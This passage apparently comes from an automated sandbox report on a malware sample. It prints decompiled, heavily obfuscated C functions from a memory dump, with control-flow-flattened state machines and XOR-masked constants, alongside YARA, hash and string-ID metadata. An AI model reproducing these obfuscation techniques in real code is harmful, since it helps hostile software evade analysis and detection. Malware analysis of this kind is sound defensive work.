                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				E006C602B(_t188);
                                          				_v8 = 0x50f8de;
                                          				_t242 = 0;
                                          				_v4 = _v4 & 0;
                                          				_t252 =  &(( &_v80)[6]);
                                          				_v76 = 0x4711;
                                          				_v76 = _v76 + 0x6e0d;
                                          				_t222 = 0x302d2de5;
                                          				_v76 = _v76 << 0x10;
                                          				_v76 = _v76 | 0x353296c6;
                                          				_v76 = _v76 ^ 0xb53e96c7;
                                          				_v52 = 0x1390;
                                          				_v52 = _v52 << 4;
                                          				_v52 = _v52 | 0x6ec3950a;
                                          				_t243 = 0x1f;
                                          				_v52 = _v52 * 0x25;
                                          				_v52 = _v52 ^ 0x024a5273;
                                          				_v64 = 0xc0d5;
                                          				_v64 = _v64 >> 3;
                                          				_v64 = _v64 ^ 0x4ce1daf8;
                                          				_v64 = _v64 + 0xffff0c87;
                                          				_v64 = _v64 ^ 0x4ce0d906;
                                          				_v24 = 0xb115;
                                          				_v24 = _v24 / _t243;
                                          				_v24 = _v24 ^ 0x000025ae;
                                          				_v68 = 0xbf02;
                                          				_v68 = _v68 >> 1;
                                          				_v68 = _v68 >> 7;
                                          				_v68 = _v68 | 0xaaaffe07;
                                          				_v68 = _v68 ^ 0xaaaf82c8;
                                          				_v72 = 0x967c;
                                          				_v72 = _v72 ^ 0xbb45b93e;
                                          				_t244 = 0x5e;
                                          				_v72 = _v72 * 0x31;
                                          				_v72 = _v72 | 0x543854ee;
                                          				_v72 = _v72 ^ 0xdc3e0629;
                                          				_v28 = 0xb197;
                                          				_v28 = _v28 / _t244;
                                          				_v28 = _v28 ^ 0x00005929;
                                          				_v80 = 0xf6df;
                                          				_v80 = _v80 * 0x2c;
                                          				_v80 = _v80 + 0xffff5b03;
                                          				_v80 = _v80 ^ 0xcc4f4477;
                                          				_v80 = _v80 ^ 0xcc66b212;
                                          				_v60 = 0x7f94;
                                          				_v60 = _v60 * 0x70;
                                          				_v60 = _v60 + 0xffff5d6f;
                                          				_v60 = _v60 + 0xffffe912;
                                          				_v60 = _v60 ^ 0x0037713c;
                                          				_v40 = 0x7639;
                                          				_v40 = _v40 ^ 0xf24db204;
                                          				_v40 = _v40 * 0xf;
                                          				_v40 = _v40 ^ 0x328e289a;
                                          				_v20 = 0xd74f;
                                          				_v20 = _v20 | 0xd22ad029;
                                          				_v20 = _v20 ^ 0xd22a9d24;
                                          				_v16 = 0xecd5;
                                          				_v16 = _v16 << 7;
                                          				_v16 = _v16 ^ 0x0076152b;
                                          				_v44 = 0x5bc3;
                                          				_v44 = _v44 + 0x5ef7;
                                          				_v44 = _v44 | 0x81401b0a;
                                          				_v44 = _v44 >> 0xf;
                                          				_v44 = _v44 ^ 0x00015921;
                                          				_v32 = 0x3f29;
                                          				_t245 = 0x22;
                                          				_v32 = _v32 / _t245;
                                          				_v32 = _v32 >> 0xd;
                                          				_v32 = _v32 ^ 0x00005264;
                                          				_v48 = 0x731;
                                          				_v48 = _v48 | 0x306aed8f;
                                          				_v48 = _v48 + 0xffff48d8;
                                          				_t246 = 0x76;
                                          				_v48 = _v48 / _t246;
                                          				_v48 = _v48 ^ 0x0069195c;
                                          				_v36 = 0x33bb;
                                          				_t247 = 0x45;
                                          				_v36 = _v36 / _t247;
                                          				_v36 = _v36 + 0xffffe7cb;
                                          				_v36 = _v36 ^ 0xfffff379;
                                          				_v56 = 0xdfcb;
                                          				_t248 = 0x48;
                                          				_v56 = _v56 / _t248;
                                          				_t249 = 0x3a;
                                          				_v56 = _v56 / _t249;
                                          				_v56 = _v56 * 0x52;
                                          				_v56 = _v56 ^ 0x00005386;
                                          				do {
                                          					while(_t222 != 0x246653ae) {
                                          						if(_t222 == 0x260f4fd2) {
                                          							_push(_t222);
                                          							_push(_t222);
                                          							_t242 = E006C8736(_v12);
                                          							if(_t242 != 0) {
                                          								_t222 = 0x246653ae;
                                          								continue;
                                          							}
                                          						} else {
                                          							if(_t222 == 0x2ff0f75c) {
                                          								_t219 = E006D59A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
                                          								_t252 =  &(_t252[0xb]);
                                          								if(_t219 != 0) {
                                          									_t222 = 0x260f4fd2;
                                          									continue;
                                          								}
                                          							} else {
                                          								if(_t222 != 0x302d2de5) {
                                          									goto L11;
                                          								} else {
                                          									_t222 = 0x2ff0f75c;
                                          									continue;
                                          								}
                                          							}
                                          						}
                                          						goto L12;
                                          					}
                                          					E006D59A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
                                          					_t252 =  &(_t252[0xb]);
                                          					 *_t220 = _v12;
                                          					_t222 = 0x6a13bb9;
                                          					L11:
                                          				} while (_t222 != 0x6a13bb9);
                                          				L12:
                                          				return _t242;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: n$)?$9v$<q7$dR$--0$--0$T8T
                                          • API String ID: 0-1820671589
                                          • Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                          • Instruction ID: 7bdf02b1e02663e17eeecba04bbdf26f2490c891eeda8113fcca29fce961b1e4
                                          • Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                          • Instruction Fuzzy Hash: 9D9142714093419BD368CF61C98992FFBF1FBC5B58F405A1DF2969A260C3B68A058F46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006DA0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
                                          				intOrPtr _v4;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				void* _t237;
                                          				void* _t251;
                                          				void* _t256;
                                          				short _t257;
                                          				void* _t258;
                                          				void* _t262;
                                          				signed int _t268;
                                          				signed int _t269;
                                          				void* _t271;
                                          				signed int _t309;
                                          				signed int _t310;
                                          				signed int _t311;
                                          				signed int _t312;
                                          				signed int _t313;
                                          				signed int _t314;
                                          				signed int _t315;
                                          				signed int _t316;
                                          				signed int _t317;
                                          				intOrPtr _t319;
                                          				signed int _t320;
                                          				signed int _t323;
                                          				signed int* _t325;
                                          				void* _t327;
                                          
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t237);
                                          				_v8 = _v8 & 0x00000000;
                                          				_t325 =  &(( &_v108)[4]);
                                          				_v36 = 0x3ea4;
                                          				_v36 = _v36 >> 7;
                                          				_t271 = 0x1d995f52;
                                          				_v36 = _v36 ^ 0x0000fd94;
                                          				_v100 = 0xb5d8;
                                          				_t313 = 0x12;
                                          				_v100 = _v100 / _t313;
                                          				_v100 = _v100 + 0xffffd667;
                                          				_v100 = _v100 << 9;
                                          				_v100 = _v100 ^ 0xffc12715;
                                          				_v44 = 0xa7b5;
                                          				_v44 = _v44 + 0x5ef4;
                                          				_v44 = _v44 ^ 0x00014b95;
                                          				_v48 = 0x9389;
                                          				_v48 = _v48 + 0xb0ba;
                                          				_v48 = _v48 ^ 0x000118ce;
                                          				_v88 = 0x5fea;
                                          				_t314 = 0x1c;
                                          				_v88 = _v88 * 0x7c;
                                          				_v88 = _v88 ^ 0x636ec63e;
                                          				_v88 = _v88 ^ 0x63409d32;
                                          				_v16 = 0x76ea;
                                          				_v16 = _v16 << 5;
                                          				_v16 = _v16 ^ 0x000ec3ec;
                                          				_v20 = 0x91aa;
                                          				_v20 = _v20 | 0x0edf39e6;
                                          				_v20 = _v20 ^ 0x0edfdf8b;
                                          				_v52 = 0xaa70;
                                          				_v52 = _v52 + 0x8ed4;
                                          				_v52 = _v52 ^ 0x00017b8d;
                                          				_v104 = 0xa114;
                                          				_v104 = _v104 >> 5;
                                          				_v104 = _v104 << 0xc;
                                          				_v104 = _v104 / _t314;
                                          				_v104 = _v104 ^ 0x0002b555;
                                          				_v108 = 0xd093;
                                          				_v108 = _v108 << 0xa;
                                          				_t315 = 0x69;
                                          				_v108 = _v108 * 0x4a;
                                          				_v108 = _v108 / _t315;
                                          				_v108 = _v108 ^ 0x024bf4a9;
                                          				_v80 = 0x5298;
                                          				_v80 = _v80 | 0xf2bddfef;
                                          				_v80 = _v80 ^ 0xf2bdee35;
                                          				_v84 = 0xad61;
                                          				_v84 = _v84 << 6;
                                          				_v84 = _v84 ^ 0x5376a172;
                                          				_v84 = _v84 ^ 0x535d9bb3;
                                          				_v96 = 0xfad4;
                                          				_v96 = _v96 + 0xc0fb;
                                          				_t316 = 0x75;
                                          				_v96 = _v96 / _t316;
                                          				_t317 = 0x41;
                                          				_t323 = _a8;
                                          				_v96 = _v96 / _t317;
                                          				_v96 = _v96 ^ 0x00007e63;
                                          				_v40 = 0x6cc;
                                          				_v40 = _v40 + 0x5321;
                                          				_v40 = _v40 ^ 0x00002fe7;
                                          				_v76 = 0xe38c;
                                          				_v76 = _v76 + 0x66b4;
                                          				_v76 = _v76 >> 5;
                                          				_v76 = _v76 ^ 0x00001a53;
                                          				_v68 = 0xaffd;
                                          				_v68 = _v68 + 0x9b0e;
                                          				_v68 = _v68 ^ 0x74692a2f;
                                          				_v68 = _v68 ^ 0x74685d67;
                                          				_v92 = 0xd493;
                                          				_v92 = _v92 >> 5;
                                          				_v92 = _v92 + 0xffffb819;
                                          				_v92 = _v92 << 3;
                                          				_v92 = _v92 ^ 0xfffdea97;
                                          				_v32 = 0x61b7;
                                          				_v32 = _v32 >> 0xa;
                                          				_v32 = _v32 ^ 0x00001b97;
                                          				_v72 = 0x8555;
                                          				_v72 = _v72 >> 6;
                                          				_v72 = _v72 >> 7;
                                          				_v72 = _v72 ^ 0x00005e98;
                                          				_v64 = 0xfd5d;
                                          				_v64 = _v64 ^ 0xfb760f92;
                                          				_v64 = _v64 + 0xe44c;
                                          				_v64 = _v64 ^ 0xfb77c0e2;
                                          				_v24 = 0xfd78;
                                          				_v24 = _v24 ^ 0x534e19f9;
                                          				_v24 = _v24 ^ 0x534eb204;
                                          				_v28 = 0xae38;
                                          				_v28 = _v28 ^ 0x0fcca386;
                                          				_v28 = _v28 ^ 0x0fcc33c1;
                                          				_t268 = _a8;
                                          				_v56 = 0x9a6f;
                                          				_v56 = _v56 | 0xcfdc8d68;
                                          				_v56 = _v56 ^ 0xf237fb5d;
                                          				_v56 = _v56 ^ 0x3deb56e2;
                                          				_v12 = 0xde50;
                                          				_v12 = _v12 << 0xc;
                                          				_v12 = _v12 ^ 0x0de56132;
                                          				_v60 = 0x8399;
                                          				_v60 = _v60 ^ 0x95508e48;
                                          				_v60 = _v60 ^ 0xc724022f;
                                          				_v60 = _v60 ^ 0x52742192;
                                          				while(1) {
                                          					L1:
                                          					_t251 = 0x10ef006b;
                                          					do {
                                          						while(1) {
                                          							L2:
                                          							_t327 = _t271 - 0x1d995f52;
                                          							if(_t327 > 0) {
                                          								break;
                                          							}
                                          							if(_t327 == 0) {
                                          								_t271 = 0x1679d154;
                                          								continue;
                                          							} else {
                                          								if(_t271 == 0x829cfc0) {
                                          									_t311 = _v8;
                                          									if(_t311 != 0) {
                                          										do {
                                          											_t320 =  *((intOrPtr*)(_t311 + 0x220));
                                          											E006CF536(_v56, _v12, _v60, _t311);
                                          											_t311 = _t320;
                                          										} while (_t320 != 0);
                                          									}
                                          								} else {
                                          									if(_t271 == _t251) {
                                          										_t312 = _v8;
                                          										_t268 = 0;
                                          										if(_t312 != 0) {
                                          											do {
                                          												E006C6636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
                                          												_t256 = E006D0ADC(_t312 + 0xc, _v40, _v76);
                                          												_t325 =  &(_t325[4]);
                                          												_t269 = _t268 + _t256;
                                          												_t257 = 0x2c;
                                          												 *((short*)(_t323 + _t269 * 2)) = _t257;
                                          												_t268 = _t269 + 1;
                                          												_t312 =  *((intOrPtr*)(_t312 + 0x220));
                                          											} while (_t312 != 0);
                                          											_t251 = 0x10ef006b;
                                          										}
                                          										_t319 = _v4;
                                          										_t271 = 0x33a3af6e;
                                          										_t310 = _a8;
                                          										continue;
                                          									} else {
                                          										if(_t271 == 0x1679d154) {
                                          											E006D5A61( &_v8, E006D8D1C, _v44, _v48, _v88);
                                          											_t325 =  &(_t325[4]);
                                          											_t271 = 0x20b4c829;
                                          											while(1) {
                                          												L1:
                                          												_t251 = 0x10ef006b;
                                          												goto L2;
                                          											}
                                          										} else {
                                          											if(_t271 != 0x19514a0a) {
                                          												goto L24;
                                          											} else {
                                          												_push(_t271);
                                          												_push(_t271);
                                          												_t323 = E006C8736(_t319 + _t319);
                                          												_t251 = 0x10ef006b;
                                          												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
                                          												continue;
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          							L28:
                                          							return 0 |  *_a8 != 0x00000000;
                                          						}
                                          						if(_t271 == 0x20b4c829) {
                                          							_t309 = _v8;
                                          							_t319 = 0;
                                          							_v4 = 0;
                                          							if(_t309 != 0) {
                                          								do {
                                          									_t258 = E006D0ADC(_t309 + 0xc, _v16, _v20);
                                          									_t309 =  *(_t309 + 0x220);
                                          									_t319 = _t319 + 1 + _t258;
                                          								} while (_t309 != 0);
                                          								_v4 = _t319;
                                          								_t251 = 0x10ef006b;
                                          							}
                                          							_t310 = _a8;
                                          							_t271 = 0x19514a0a;
                                          							goto L24;
                                          						} else {
                                          							if(_t271 == 0x2b3a1c97) {
                                          								E006CF536(_v64, _v24, _v28, _t323);
                                          								_t271 = 0x829cfc0;
                                          								goto L1;
                                          							} else {
                                          								if(_t271 != 0x33a3af6e) {
                                          									goto L24;
                                          								} else {
                                          									_t260 = _t310 + 4;
                                          									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
                                          									_t262 = E006D5D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
                                          									_t325 =  &(_t325[6]);
                                          									 *_t310 = _t262;
                                          									_t271 = 0x2b3a1c97;
                                          									while(1) {
                                          										L1:
                                          										_t251 = 0x10ef006b;
                                          										goto L2;
                                          									}
                                          								}
                                          							}
                                          						}
                                          						goto L28;
                                          						L24:
                                          					} while (_t271 != 0x202e1177);
                                          					goto L28;
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 2a$L$c~$g]ht$/$V=$_
                                          • API String ID: 0-445983283
                                          • Opcode ID: 0d4faabd9a9341c50fb55503336c1c558b5e58b03c0d629d0468315073e1cc07
                                          • Instruction ID: 2bce74e8d6bfedb876b19f8d4dcc3ae17f8047c0c07a690a568261e96bc84059
                                          • Opcode Fuzzy Hash: 0d4faabd9a9341c50fb55503336c1c558b5e58b03c0d629d0468315073e1cc07
                                          • Instruction Fuzzy Hash: E6D1647290C7418FD368CF61D48995BBBE2FBC4718F60890DF596862A0C7B49909CF83
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D7F1F(void* __ecx) {
                                          				intOrPtr _v4;
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				void* _t229;
                                          				void* _t232;
                                          				void* _t233;
                                          				void* _t236;
                                          				void* _t238;
                                          				void* _t241;
                                          				void* _t246;
                                          				void* _t247;
                                          				signed int _t249;
                                          				signed int _t250;
                                          				signed int _t251;
                                          				signed int _t252;
                                          				signed int _t253;
                                          				intOrPtr _t271;
                                          				void* _t272;
                                          				signed int* _t274;
                                          				void* _t277;
                                          
                                          				_t274 =  &_v104;
                                          				_v16 = 0x432510;
                                          				_v12 = 0x57033b;
                                          				_v8 = 0x70a374;
                                          				_t271 = 0;
                                          				_t247 = __ecx;
                                          				_v4 = 0;
                                          				_t272 = 0x285a15;
                                          				_v52 = 0x28a8;
                                          				_v52 = _v52 << 0xb;
                                          				_t249 = 0x64;
                                          				_v52 = _v52 / _t249;
                                          				_v52 = _v52 ^ 0x00032641;
                                          				_v56 = 0x58c1;
                                          				_v56 = _v56 ^ 0x08ae2152;
                                          				_v56 = _v56 ^ 0xe42bbac7;
                                          				_v56 = _v56 ^ 0xec85f018;
                                          				_v60 = 0x32b9;
                                          				_v60 = _v60 >> 7;
                                          				_v60 = _v60 ^ 0x4ab7c61f;
                                          				_v60 = _v60 ^ 0x4ab7bf69;
                                          				_v88 = 0xcc29;
                                          				_v88 = _v88 << 7;
                                          				_v88 = _v88 >> 0xe;
                                          				_t250 = 0x27;
                                          				_v88 = _v88 * 0x71;
                                          				_v88 = _v88 ^ 0x00008073;
                                          				_v28 = 0x82bf;
                                          				_v28 = _v28 / _t250;
                                          				_v28 = _v28 ^ 0x0000421a;
                                          				_v80 = 0xde89;
                                          				_v80 = _v80 | 0x25f7ab60;
                                          				_v80 = _v80 + 0xffffb767;
                                          				_v80 = _v80 ^ 0x25f7d2d5;
                                          				_v84 = 0xb172;
                                          				_v84 = _v84 | 0x58f01ffb;
                                          				_v84 = _v84 ^ 0x6aa9a845;
                                          				_v84 = _v84 | 0x8208c103;
                                          				_v84 = _v84 ^ 0xb259d8d2;
                                          				_v48 = 0xe27e;
                                          				_v48 = _v48 | 0xfee9bf5f;
                                          				_v48 = _v48 ^ 0xfee98d98;
                                          				_v64 = 0x40d4;
                                          				_v64 = _v64 + 0xfffff13c;
                                          				_v64 = _v64 << 8;
                                          				_v64 = _v64 ^ 0x00321441;
                                          				_v68 = 0x6862;
                                          				_v68 = _v68 + 0x864e;
                                          				_v68 = _v68 << 3;
                                          				_v68 = _v68 ^ 0x0007582b;
                                          				_v92 = 0x5758;
                                          				_v92 = _v92 | 0xff7df76f;
                                          				_t251 = 0x39;
                                          				_v92 = _v92 / _t251;
                                          				_v92 = _v92 ^ 0x047b2a85;
                                          				_v96 = 0x40be;
                                          				_v96 = _v96 | 0xd59932a3;
                                          				_v96 = _v96 << 0xb;
                                          				_v96 = _v96 * 0x52;
                                          				_v96 = _v96 ^ 0x36096eff;
                                          				_v72 = 0x18a0;
                                          				_v72 = _v72 + 0x45e5;
                                          				_v72 = _v72 + 0xffff9352;
                                          				_v72 = _v72 ^ 0xffff81db;
                                          				_v100 = 0x6e96;
                                          				_v100 = _v100 * 0x3a;
                                          				_v100 = _v100 << 0x10;
                                          				_v100 = _v100 ^ 0x7246fe44;
                                          				_v100 = _v100 ^ 0x7fbac885;
                                          				_v104 = 0x65cf;
                                          				_v104 = _v104 / _t251;
                                          				_v104 = _v104 ^ 0xf75b4ca1;
                                          				_t252 = 0x48;
                                          				_v104 = _v104 / _t252;
                                          				_v104 = _v104 ^ 0x036f7b06;
                                          				_v76 = 0x2c53;
                                          				_t253 = 0x57;
                                          				_v76 = _v76 * 0x11;
                                          				_v76 = _v76 ^ 0x6f057687;
                                          				_v76 = _v76 ^ 0x6f07c581;
                                          				_v24 = 0x7097;
                                          				_v24 = _v24 >> 4;
                                          				_v24 = _v24 ^ 0x000060b2;
                                          				_v36 = 0x9151;
                                          				_v36 = _v36 << 0x10;
                                          				_v36 = _v36 ^ 0x43d947ca;
                                          				_v36 = _v36 ^ 0xd2881410;
                                          				_v40 = 0x482c;
                                          				_v40 = _v40 + 0xffffb888;
                                          				_v40 = _v40 << 1;
                                          				_v40 = _v40 ^ 0x00000914;
                                          				_v44 = 0x389f;
                                          				_v44 = _v44 * 0x76;
                                          				_v44 = _v44 * 0x18;
                                          				_v44 = _v44 ^ 0x02723fe4;
                                          				_v32 = 0x2aa8;
                                          				_v32 = _v32 * 0x38;
                                          				_v32 = _v32 ^ 0x551469c6;
                                          				_v32 = _v32 ^ 0x551d1a3f;
                                          				_v20 = 0xfc56;
                                          				_v20 = _v20 / _t253;
                                          				_v20 = _v20 ^ 0x000001b5;
                                          				goto L1;
                                          				do {
                                          					while(1) {
                                          						L1:
                                          						_t277 = _t272 - 0x17308d28;
                                          						if(_t277 > 0) {
                                          							break;
                                          						}
                                          						if(_t277 == 0) {
                                          							_push(_t253);
                                          							_t236 = E006D7F1B();
                                          							_t274 =  &(_t274[1]);
                                          							_t272 = 0x2b65fd67;
                                          							_t271 = _t271 + _t236;
                                          							continue;
                                          						} else {
                                          							if(_t272 == 0x285a15) {
                                          								_t272 = 0x27256339;
                                          								continue;
                                          							} else {
                                          								if(_t272 == 0x30e9834) {
                                          									_t253 = _v72;
                                          									_t238 = E006CD64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
                                          									_t274 =  &(_t274[3]);
                                          									_t272 = 0x1bffcccd;
                                          									_t271 = _t271 + _t238;
                                          									continue;
                                          								} else {
                                          									if(_t272 == 0x527ec93) {
                                          										_push(_t253);
                                          										_t241 = E006D7F1B();
                                          										_t274 =  &(_t274[1]);
                                          										_t272 = 0x1cfcffb7;
                                          										_t271 = _t271 + _t241;
                                          										continue;
                                          									} else {
                                          										if(_t272 != 0x60183f8) {
                                          											goto L21;
                                          										} else {
                                          											_push(_v32);
                                          											_t271 = _t271 + E006D7F1B();
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L8:
                                          						return _t271;
                                          					}
                                          					if(_t272 == 0x1bffcccd) {
                                          						_t253 = _v24;
                                          						_t229 = E006CD64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
                                          						_t274 =  &(_t274[3]);
                                          						_t272 = 0x60183f8;
                                          						_t271 = _t271 + _t229;
                                          						goto L21;
                                          					} else {
                                          						if(_t272 == 0x1cfcffb7) {
                                          							_push(_t253);
                                          							_t232 = E006D7F1B();
                                          							_t274 =  &(_t274[1]);
                                          							_t272 = 0x17308d28;
                                          							_t271 = _t271 + _t232;
                                          							goto L1;
                                          						} else {
                                          							if(_t272 == 0x27256339) {
                                          								_t253 = _v52;
                                          								_t233 = E006CD64E(_t253, _v56, _v60, _t247, _v88);
                                          								_t274 =  &(_t274[3]);
                                          								_t272 = 0x527ec93;
                                          								_t271 = _t271 + _t233;
                                          								goto L1;
                                          							} else {
                                          								if(_t272 != 0x2b65fd67) {
                                          									goto L21;
                                          								} else {
                                          									_push(_t253);
                                          									_t246 = E006D7F1B();
                                          									_t274 =  &(_t274[1]);
                                          									_t272 = 0x30e9834;
                                          									_t271 = _t271 + _t246;
                                          									goto L1;
                                          								}
                                          							}
                                          						}
                                          					}
                                          					goto L8;
                                          					L21:
                                          				} while (_t272 != 0x28759a70);
                                          				goto L8;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ,H$9c%'$9c%'$S,$XW$bh$~
                                          • API String ID: 0-4263808623
                                          • Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                          • Instruction ID: 0d63a368c1bccab6efd3681f5ee91a14f9314da521f5f4085ff77b8b7a82897d
                                          • Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                          • Instruction Fuzzy Hash: 40B121B29093808FD358CF25D98A40BFBE2BB85744F40891EF58697260D7B5DA09CF87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006C69A0(intOrPtr __ecx, intOrPtr* __edx) {
                                          				intOrPtr _v4;
                                          				intOrPtr _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				void* __edi;
                                          				void* __ebp;
                                          				void* _t182;
                                          				intOrPtr _t188;
                                          				intOrPtr _t190;
                                          				intOrPtr _t191;
                                          				intOrPtr _t192;
                                          				intOrPtr* _t193;
                                          				signed int _t195;
                                          				signed int _t196;
                                          				signed int _t197;
                                          				void* _t198;
                                          				void* _t199;
                                          				void* _t218;
                                          				intOrPtr _t222;
                                          				void* _t223;
                                          				intOrPtr _t227;
                                          				signed int* _t228;
                                          
                                          				_t228 =  &_v84;
                                          				_v8 = 0x71163c;
                                          				_t222 = 0;
                                          				_t193 = __edx;
                                          				_v4 = 0;
                                          				_v44 = 0xc562;
                                          				_t227 = __ecx;
                                          				_v44 = _v44 >> 2;
                                          				_t223 = 0xa9ba57f;
                                          				_v44 = _v44 ^ 0x8749252f;
                                          				_v44 = _v44 ^ 0x87491d9f;
                                          				_v16 = 0x2187;
                                          				_v16 = _v16 + 0x9003;
                                          				_v16 = _v16 ^ 0x00009583;
                                          				_v64 = 0x884c;
                                          				_v64 = _v64 ^ 0x157bb051;
                                          				_t195 = 0x5b;
                                          				_v64 = _v64 / _t195;
                                          				_v64 = _v64 + 0xffffc6fd;
                                          				_v64 = _v64 ^ 0x003c6beb;
                                          				_v76 = 0xc2af;
                                          				_t196 = 0x62;
                                          				_v76 = _v76 / _t196;
                                          				_v76 = _v76 << 0xb;
                                          				_v76 = _v76 + 0xffffe747;
                                          				_v76 = _v76 ^ 0x000fbc5b;
                                          				_v20 = 0xd86f;
                                          				_v20 = _v20 << 0xb;
                                          				_v20 = _v20 ^ 0x06c32379;
                                          				_v24 = 0x5847;
                                          				_v24 = _v24 ^ 0xbe016602;
                                          				_v24 = _v24 ^ 0xbe0159ab;
                                          				_v56 = 0x8b9e;
                                          				_v56 = _v56 << 8;
                                          				_v56 = _v56 ^ 0x62eb1469;
                                          				_v56 = _v56 ^ 0x62609790;
                                          				_v60 = 0xc8f5;
                                          				_v60 = _v60 | 0xe944ef36;
                                          				_v60 = _v60 ^ 0xbc6be2e2;
                                          				_v60 = _v60 ^ 0x552f2627;
                                          				_v84 = 0x43ed;
                                          				_v84 = _v84 ^ 0x08a0b069;
                                          				_v84 = _v84 | 0x0c951c83;
                                          				_v84 = _v84 + 0x562e;
                                          				_v84 = _v84 ^ 0x0cb6752c;
                                          				_v48 = 0x4b81;
                                          				_v48 = _v48 >> 0xc;
                                          				_v48 = _v48 + 0xffff2892;
                                          				_v48 = _v48 ^ 0xffff31fe;
                                          				_v80 = 0x3016;
                                          				_v80 = _v80 + 0x7dde;
                                          				_v80 = _v80 << 0xf;
                                          				_t197 = 0x36;
                                          				_v80 = _v80 / _t197;
                                          				_v80 = _v80 ^ 0x019c7f33;
                                          				_v52 = 0xfd2;
                                          				_v52 = _v52 + 0xffff2d18;
                                          				_v52 = _v52 + 0x6a3f;
                                          				_v52 = _v52 ^ 0xffffabb5;
                                          				_v28 = 0xa77b;
                                          				_v28 = _v28 ^ 0xae749dbd;
                                          				_v28 = _v28 ^ 0xae743f32;
                                          				_v32 = 0xf75f;
                                          				_v32 = _v32 | 0x58371397;
                                          				_v32 = _v32 ^ 0x5837ee79;
                                          				_v68 = 0x3d22;
                                          				_v68 = _v68 >> 0xd;
                                          				_v68 = _v68 << 0xf;
                                          				_v68 = _v68 >> 2;
                                          				_v68 = _v68 ^ 0x00007889;
                                          				_v72 = 0xcbcf;
                                          				_v72 = _v72 | 0x3a65856e;
                                          				_v72 = _v72 + 0xdb4;
                                          				_v72 = _v72 | 0x1789f940;
                                          				_v72 = _v72 ^ 0x3feda3a8;
                                          				_v36 = 0x2389;
                                          				_v36 = _v36 * 0x4b;
                                          				_v36 = _v36 | 0x61940fa3;
                                          				_v36 = _v36 ^ 0x619e1b1f;
                                          				_v40 = 0xa903;
                                          				_v40 = _v40 + 0x4cf2;
                                          				_v40 = _v40 | 0xc82713d6;
                                          				_v40 = _v40 ^ 0xc827b671;
                                          				_v12 = 0xc1c;
                                          				_v12 = _v12 ^ 0x8bcf36f0;
                                          				_v12 = _v12 ^ 0x8bcf5121;
                                          				while(1) {
